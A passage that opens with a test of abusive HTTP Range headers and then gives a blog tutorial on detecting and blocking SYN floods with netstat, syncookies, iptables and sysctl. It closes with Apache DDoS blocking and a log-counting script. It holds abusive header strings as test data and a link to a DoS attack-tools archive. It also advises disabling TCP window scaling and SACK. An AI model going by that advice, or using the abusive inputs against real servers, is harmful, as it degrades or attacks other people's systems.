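    for h in ("bytes=0-99,500-599", "bytes=0-,0-,0-", "bytes=" + ",".join("5-" for _ in range(300))):
        print(h[:40], "->", assess_range_header(h, 1000))
```

The "ignore" outcome is the safe default: a client that sent an abusive header still gets a correct (if larger) 200 response, while the server never builds hundreds of in-memory copies of the same bytes.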



What is a SYN Flooding Attack?

Hacking 2011. 8. 31. 07:35

A SYN flooding attack is a server attack that exploits a weakness in the way a TCP session is established.

First, the basic TCP connection steps are as follows.

  1. A (the source host) sends B (the destination server) a SYN packet requesting a connection.
  2. B replies to A with a SYN and ACK packet accepting the request.
  3. A sends an ACK to B; the connection is established and data exchange begins.

In step 2 above, the destination server (B) does not wait indefinitely for the ACK packet from the source host (A): for a fixed period it holds the connection information (the entry) in the space the backlog queue allows, and drops it if no ACK arrives.
If such requests keep arriving and connection entries pile up, the targeted service on the destination server (B) can be brought down. This attack, a form of DoS attack, is called SYN flooding.
After recording a SYN the server waits until the timeout expires; by sending SYN requests at intervals shorter than that timeout the attacker fills the queue and paralyzes the service, and the attack is also carried out indiscriminately with SYNs carrying invalid values.

Detecting a SYN Flooding Attack

  1. If SYN_RECV entries are present, assume the server is exposed to the attack.
    ~$ netstat -na | grep SYN
    tcp 0 0 61.250.171.252:28004 94.9.83.63:3072 SYN_RECV
    tcp 0 0 61.250.171.252:28004 3.7.244.2:3072 SYN_RECV
    tcp 0 0 61.250.171.252:28004 48.32.206.32:3072 SYN_RECV
    
    ~$ netstat -na |grep SYN | wc -l
    146
    
    Under normal conditions this count should be close to 0.
  2. When SYN cookies are enabled and a SYN flood occurs, the following appears in the messages log file:
    #Possible SYN flooding on port 80. Sending cookies.

Blocking a SYN Flooding Attack

There are two ways to block a SYN flooding attack: increase the size of the backlog queue, and set tcp_syncookies to 1.

  1. Increase the SYN backlog size
    Check the server's current backlog queue value with cat /proc/sys/net/ipv4/tcp_max_syn_backlog
    ~$ cat /proc/sys/net/ipv4/tcp_max_syn_backlog
    1024
    
    If it is smaller than 1024, set it to 1024 or higher.
    
    sysctl -w net.ipv4.tcp_max_syn_backlog=1024
  2. Enable SYN cookies
    Even after enlarging the backlog queue as above, that is only a stopgap: under a sustained attack the queue will eventually fill up. SYN cookies therefore have to be enabled in addition to enlarging the backlog queue.
    Check the server's current SYN cookie value with cat /proc/sys/net/ipv4/tcp_syncookies; if it is 0, change it to 1 as follows:
    sysctl -w net.ipv4.tcp_syncookies=1
    ~$ cat /proc/sys/net/ipv4/tcp_syncookies
    1
    ~$ sysctl -w net.ipv4.tcp_syncookies=1
    error: permission denied on key 'net.ipv4.tcp_syncookies'
    ~$ sudo sysctl -w net.ipv4.tcp_syncookies=1
    net.ipv4.tcp_syncookies = 1

    Because SYN cookies let the server keep accepting legitimate connection requests even when the backlog queue is full, they are one of the most effective defenses against SYN flooding.

  3. iptables
    • Block an IP directly
      ~$ iptables -A INPUT -s <Source IP> -j DROP
    • Add rules
      ~$ iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
      ~$ iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
      ~$ iptables -A INPUT -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
      ~$ iptables -A INPUT -p tcp --tcp-flags ACK,FIN FIN -j DROP
      ~$ service iptables save
      ~$ service iptables restart
  4. Add rules to sysctl.conf
    ~$ vi /etc/sysctl.conf
    
    # Enable TCP SYN cookie protection
    net.ipv4.tcp_syncookies = 1
    
    # Decrease the time default value for tcp_fin_timeout connection
    net.ipv4.tcp_fin_timeout = 30
    
    # Turn off the tcp_window_scaling
    net.ipv4.tcp_window_scaling = 0
    
    # Turn off the tcp_sack
    net.ipv4.tcp_sack = 0
    
    Then execute the command:
    # /sbin/sysctl -p
  5. List iptables rules (verification step after adding or removing a block; below is the output when iptables is at its defaults)
    ~$ iptables -L
    Chain INPUT (policy ACCEPT)
    target     prot opt source               destination
    Chain FORWARD (policy ACCEPT)
    target     prot opt source               destination
    Chain OUTPUT (policy ACCEPT)
    target     prot opt source               destination


Attack tools

http://packetstormsecurity.nl/DoS/



DDoS Countermeasures

Hacking 2011. 8. 31. 07:34

DDoS response methods

This describes how to respond to a DDoS attack at the Apache web server level.

  • DDoS detection
    Detection is usually reported by the System team, but the web team also needs to verify it.
    • Measure the number of requests per IP in the Apache log
      tail -n 10000 access_log | cut -f1 -d' ' | sort | uniq -c | sort -nk 1
    • Measure the number of requests for a specific IP/Agent
      grep 'A cat' access_log | cut -f1 -d' ' | sort | uniq -c

      The Apache log file is located at /usr/local/apache/log/access

  • IP Block
    Add Deny from to the Directory section of the host's Apache VirtualHost settings
    <Directory "/usr/local/tomcat/webapps/ROOT">
        Options -Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order allow,deny
        Allow from all
        Deny from xxx.xxx.xxx.xxx
        FileETag None
    </Directory>
  • Agent Block
    In the host's Apache VirtualHost settings, tag the Agent pattern with an environment variable and add it to Deny from as shown below
    <Location ~ "/*">
        Order allow,deny
        Allow from all
        Deny from env=bad_req
    </Location>
    SetEnvIfNoCase User-Agent "^Mozilla/4.0.*MyIE 3.01" bad_req
  • Syn Flooding
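The two shell pipelines in the detection bullet above (requests per IP, requests per User-Agent) and the two Apache blocks that follow can be tied together in one script. The following Python module is an added example, not part of the original post: it parses combined-format access_log lines, counts requests per client address and per User-Agent, picks the addresses over a threshold, and reports how many logged requests the post's SetEnvIfNoCase pattern would actually tag as bad_req before the rule is deployed. The log lines, the threshold of 3 and the RFC 5737 addresses are constructed for the example.

```python
import re
from collections import Counter
from typing import Iterable, List, Set

# Apache "combined" log format; the trailing referer/user-agent pair is optional,
# so lines in the plain "common" format parse as well.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)


def parse_access_log(text: str) -> List[dict]:
    """Parse access_log text into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def requests_per_client(entries: List[dict], field: str = "ip") -> Counter:
    """Equivalent of the post's `cut -f1 -d' ' | sort | uniq -c`, generalised to any field."""
    return Counter(e[field] for e in entries if e.get(field))


def flood_sources(entries: List[dict], threshold: int) -> Set[str]:
    """Client addresses that sent at least `threshold` requests in the window."""
    return {ip for ip, n in requests_per_client(entries).items() if n >= threshold}


def agent_rule_hits(entries: List[dict], pattern: str) -> int:
    """Requests a `SetEnvIfNoCase User-Agent <pattern>` rule would tag (case-insensitive regex)."""
    rx = re.compile(pattern, re.IGNORECASE)
    return sum(1 for e in entries if e.get("agent") and rx.search(e["agent"]))


def deny_directives(ips: Iterable[str]) -> List[str]:
    """Render the `Deny from` lines to paste into the Directory block shown in the post."""
    return [f"Deny from {ip}" for ip in sorted(ips)]


# Constructed sample: one address hammering "/", two ordinary clients, one unparseable line.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [31/Aug/2011:07:34:01 +0900] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MyIE 3.01)"
203.0.113.7 - - [31/Aug/2011:07:34:01 +0900] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MyIE 3.01)"
203.0.113.7 - - [31/Aug/2011:07:34:02 +0900] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MyIE 3.01)"
203.0.113.7 - - [31/Aug/2011:07:34:02 +0900] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MyIE 3.01)"
198.51.100.2 - - [31/Aug/2011:07:34:03 +0900] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.10 - - [31/Aug/2011:07:34:04 +0900] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1)"
this line is not in access_log format
"""

if __name__ == "__main__":
    entries = parse_access_log(SAMPLE_ACCESS_LOG)
    print(requests_per_client(entries).most_common(3))
    print(deny_directives(flood_sources(entries, threshold=3)))
    print("bad_req hits:", agent_rule_hits(entries, "^Mozilla/4.0.*MyIE 3.01"))
```

Checking the pattern against the log before adding the SetEnvIfNoCase rule matters because a too-broad expression blocks legitimate browsers along with the flood.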